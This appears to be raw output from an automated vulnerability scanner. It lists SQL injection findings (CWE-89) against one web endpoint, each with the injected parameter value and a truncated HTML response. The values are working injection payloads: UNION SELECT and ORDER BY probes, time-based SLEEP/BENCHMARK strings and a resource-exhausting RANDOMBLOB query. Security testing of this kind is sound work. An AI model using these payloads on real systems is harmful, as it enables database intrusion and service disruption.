Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1581\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 21--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1582\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1583\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1584\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(\n500000000/2))))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1585\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \") or (\"x\")=(\"x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1586\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \"&\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1587\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1588\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1589\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+\nCHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+\nCHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+\nCHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)+CHAR(113),NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1590\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=\ndevice-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/\nhead/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> \nwindow.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start \nof Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://\nstatic.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> \n</script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <\nlink rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbW\nFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIo\nqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary hints\non your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1591\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1592\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 5--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1593\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1594\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found 